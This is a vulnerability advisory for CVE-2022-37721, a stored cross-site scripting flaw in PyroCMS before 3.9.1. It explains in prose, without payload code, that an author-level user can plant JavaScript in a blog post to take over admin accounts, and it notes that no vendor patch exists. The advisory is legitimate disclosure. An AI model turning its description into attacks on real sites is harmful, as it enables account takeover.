CVE-2022-37721 - Stored Cross-Site Scripting in PyroCMS

1. Vulnerability Properties

Title: Stored Cross-Site Scripting in PyroCMS
CVE ID: CVE-2022-37721
CVSSv3 Base Score: 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N)
Vendor: PyroCMS, Inc.
Products: PyroCMS
Advisory Release Date: 14 November 2022
Advisory URL: https://labs.integrity.pt/advisories/cve-2022-37721
Credits: Discovery by Bruno Barreirinhas <bb[at]integrity.pt>

2. Vulnerability Summary

PyroCMS is vulnerable to a stored XSS when a low privileged user such as an author, injects a crafted html and javascript payload in a blog post, leading to full admin account takeover or privilege escalation.
The javascript payload is executed when the affected blog post is loaded in the victim’s browser.

3. Vulnerable Versions

  • < 3.9.1

4. Solution

*No official patch released by the vendor

5. Vulnerability Timeline

  • 2/Aug/22 - Bug reported to PyroCMS
  • 3/Aug/22 - Bug verified by vendor
  • 3/Aug/22 - Notified the vendor regarding the impact (no feedback)
  • 7/Sep/22 - Contacted the vendor requesting an update (no feedback)
  • 09/Nov/22 - Notified the vender about the disclosure (no feedback)
  • 14/Nov/22 - Advisory Released

6. References

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37721


© 2022 Integrity Part of Devoteam. All rights reserved. | Cookie Policy

Cookie Consent X

Integrity S.A. uses cookies for analytical and more personalized information presentation purposes, based on your browsing habits and profile. For more detailed information, see our Cookie Policy.